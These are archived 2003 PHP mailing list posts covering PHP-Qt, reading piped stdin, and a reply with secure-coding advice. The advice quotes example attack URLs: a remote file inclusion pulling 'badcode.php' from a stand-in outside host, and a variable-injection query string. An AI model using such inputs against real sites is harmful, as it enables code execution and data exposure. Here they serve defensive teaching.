[PHP] php-qt ?

2003-07-17 Thread Marco Weber 
hi @all,

i know php-gtk and i like it...
however, i prefer qt... ;)

is there a possibility to use qt for guis?

thanks in advance for any reply
Marco Weber



-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] how to read the stuff that got piped ("|") to the script?

2003-05-27 Thread Marco Weber 
hi,

i've a simple question:

how can i read the stuff that got piped ("|") to the php-script?

i.e. "ls -l | /home/myuser/phpscript.php"



thanks in advance for any help



Marco Weber




-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] but if i do so, my script won't stop reading... :(

2003-05-27 Thread Marco Weber 

hi
> It is the stdin of the script, you can open that file handle with fopen(
> "stdin", "r" ); i believe
i also thought so, but there is a big problem:
the script runs in an infinite loop... :(
that's my piece of code:
$message='';
$input=fopen('php://stdin', 'r');
while(!feof($input)) $message.=fgets($input, 4096);
fclose($input);

...but the condition in the while loop never gets true... :(
so what can i do?

Thanks in advance
Marco Weber



-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Re: secure code

2003-05-27 Thread Marco Weber 
hi,

well, there are a lot of articles on the internet...
however, i bought a book... it really helped a lot! :)

there are so many things, developers can do worng, but here is a listing of
the most important ones:

but the most important thing you can do is to check very varaible for bad
characters...
with some special chars you can manipulate SQL-queries, open otherfiles (on
the local system OR even on remote systems) or even execute some nice
bash-scripts...
(you can avoid such attacks, if you've set register_globals to Off)
i.e.
if you include a page in your securityhole1.php via http get/post vars:

make sure, the users can't enter something like this:
securityhole1.php?page=http://www.somewhere.else/badcode.php

the second important thing is to set the variables you need to a specific
value, before you start using them, so that the users can't do something,
they shouldn't do by setting the variable to a value by a get/post request:
i.e. securityhole2.php:

in this case you can access secret information by using the following url:
securityhole2.php?showstuff=yes

it also quite important to check numbers for their value (are they too high
/ low)...
i made the experience, that you can slow down a webserver a lot, if you send
multiple requests with number values that lead i.e. to an infinite loop...
although php terminates the scripts after X seconds, it gives you the
possibility to run a lot of php scripts simultaneously! :)

Try to protect php scripts, which you don't need to access directly,  i.e.
with .htaccess files...
i.e.
store your libaries/templates in a directory and protect them with a
.htaccess like this:
BEGIN OF .htaccess sample---
order deny,allow
deny from all
END OF .htaccess sample---

there are also some important facts about file uploads... but for now, it's
quite late (3:15 in the morning...) and i'm quite tired...

there are even some more problems, especially by using the session
mechanisms

i hope, this helps to fix the main security holes...

C ya and goood night to all of you... =0)

- Marco Weber -



-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php